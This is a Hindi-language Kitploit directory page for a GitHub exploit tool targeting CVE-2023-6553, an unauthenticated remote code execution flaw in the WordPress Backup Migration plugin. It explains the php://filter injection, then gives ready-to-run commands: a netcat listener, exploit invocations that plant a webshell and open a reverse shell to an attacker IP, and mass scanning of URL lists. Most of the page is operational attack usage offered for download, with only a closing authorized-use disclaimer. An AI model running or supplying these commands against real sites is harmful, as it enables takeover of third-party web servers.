Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
WordPress_Backup_Migration-RCE_Unauthenticated — यह एक्सप्लॉइट CVE-2023-6553 पर आधारित है और Chocapik द्वारा बनाए गए मूल एक्सप्लॉइट पर निर्मित है, इसमें यह जोड़ा गया है कि सीधे रिवर्स शेल प्राप्त किया जा सकता है। | Kitploit
उपकरण/GitHub
GitHub
/joaoaugustom
/wordpress_backup_migration-rce_unauthenticated
शोषण फ्रेमवर्कभेद्यता विश्लेषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलपेलोड डेवलपमेंट
GitHubjoaoaugustom/wordpress_backup_migration-rce_unauthenticated

WordPress_Backup_Migration-RCE_Unauthenticated

यह एक्सप्लॉइट CVE-2023-6553 पर आधारित है और Chocapik द्वारा बनाए गए मूल एक्सप्लॉइट पर निर्मित है, इसमें यह जोड़ा गया है कि सीधे रिवर्स शेल प्राप्त किया जा सकता है।

रिपॉजिटरी देखें
112 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-6553 — WordPress के लिए Backup Migration प्लगिन - रिवर्स शेल

Chocapikk का CVE-2023-6553 एक्सप्लॉइट का एक विस्तारित संस्करण जो मूल इंटरैक्टिव वेबशेल के ऊपर एक-कमांड रिवर्स शेल मोड जोड़ता है।


भेद्यता

CVE-2023-6553 — Backup Migration WordPress प्लगिन (संस्करण ≤ 1.3.7) में बिना प्रमाणीकरण के रिमोट कोड निष्पादन।

यह प्लगिन backup-heart.php को उजागर करता है, जो Content-Dir HTTP हेडर से PHP फ़िल्टर चेन पढ़ता है और इसे बिना प्रमाणीकरण या सैनिटाइज़ेशन के include() में पास करता है। यह एक बिना प्रमाणीकरण वाले हमलावर को एक विशेष रूप से तैयार php://filter चेन इंजेक्ट करके मनमाना PHP कोड निष्पादित करने की अनुमति देता है।

  • CVSS: 9.8 (क्रिटिकल)
  • प्लगिन: Backup Migration ≤ 1.3.7
  • संदर्भ: WPScan

श्रेय

मूल एक्सप्लॉइट Chocapikk द्वारा — सभी मुख्य एक्सप्लॉइटेशन लॉजिक (फ़िल्टर चेन जनरेशन, फ़ाइल लेखन, इंटरैक्टिव शेल) उनका काम है। यह रिपॉजिटरी केवल इसे रिवर्स शेल ट्रिगर मोड के साथ विस्तारित करती है।


मूल से अंतर

विशेषतामूल (Chocapikk)यह संस्करण
इंटरैक्टिव वेबशेल✅✅ (अपरिवर्तित)
रिवर्स शेल❌✅ (-r)
मल्टी-URL स्कैनिंग✅✅ (अपरिवर्तित)
नए आर्ग्युमेंट—-r, -l, -p, --shell

केवल निम्नलिखित जोड़े गए हैं:

  1. trigger_reverse_shell() मेथड — वेबशेल तैनात होने के बाद (मूल जैसी ही प्रक्रिया), 0 पैरामीटर के रूप में रिवर्स शेल कमांड के साथ एक GET अनुरोध भेजता है, ठीक वैसे ही जैसे इंटरैक्टिव शेल भेजता है।
  2. 4 नए argparse आर्ग्युमेंट — रिवर्स शेल मोड को सक्षम और कॉन्फ़िगर करने के लिए।
  3. main() में 5 पंक्तियाँ — जब -r मौजूद हो तो interactive_shell() को trigger_reverse_shell() से बदलें।

बाकी सब कुछ — भेद्यता जाँच, फ़ाइल लेखन लूप, copy/unlink, इंटरैक्टिव मोड, मल्टी-URL स्कैनिंग — मूल से अछूता है।


आवश्यकताएँ

root@kitploit:~
pip install requests rich alive-progress prompt-toolkit php-filter-chain

उपयोग

रिवर्स शेल मोड (नया)

root@kitploit:~
# Start your listener first
rlwrap nc -lvnp 4444

# Run the exploit
python3 exploit.py -u http://TARGET/blog -r -l YOUR_IP -p 4444

यदि टारगेट पर bash /dev/tcp उपलब्ध नहीं है, तो mkfifo का उपयोग करें (इसके बजाय nc पर निर्भर करता है):

root@kitploit:~
python3 exploit.py -u http://TARGET/blog -r -l YOUR_IP -p 4444 --shell mkfifo

इंटरैक्टिव वेबशेल मोड (मूल व्यवहार)

root@kitploit:~
python3 exploit.py -u http://TARGET/blog

केवल भेद्यता जाँच

root@kitploit:~
python3 exploit.py -u http://TARGET/blog -c

URL की सूची स्कैन करें

root@kitploit:~
python3 exploit.py -f urls.txt -t 10 -o vulnerable.txt

सभी आर्ग्युमेंट

root@kitploit:~
-u / --url      Target base URL (e.g. http://target/blog)
-r / --revshell Enable reverse shell mode
-l / --lhost    Your IP to receive the shell (required with -r)
-p / --lport    Your listener port (default: 4444)
     --shell    Shell type: bash (default) or mkfifo
-c / --check    Check vulnerability only, do not deploy shell
-f / --file     File with list of URLs to scan
-t / --threads  Threads for multi-URL scan (default: 5)
-o / --output   Output file for scan results

यह कैसे काम करता है

root@kitploit:~
1. POST /wp-content/plugins/backup-backup/includes/backup-heart.php
   Content-Dir: php://filter/...<encoded PHP>
   → Writes webshell char by char to a temp file
   → Copies temp file to <random>.php

2. GET /wp-content/plugins/backup-backup/includes/<random>.php?0=<cmd>
   → Executes command via backtick operator
   → Interactive mode: loops reading commands from stdin
   → Reverse shell mode: sends bash/mkfifo one-liner, connects to listener

3. Cleanup: unlink(<random>.php)

अस्वीकरण

यह टूल केवल अधिकृत पेनेट्रेशन परीक्षण और सुरक्षा अनुसंधान के लिए है। उन सिस्टमों के खिलाफ उपयोग न करें जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है।

टूल डाउनलोड करें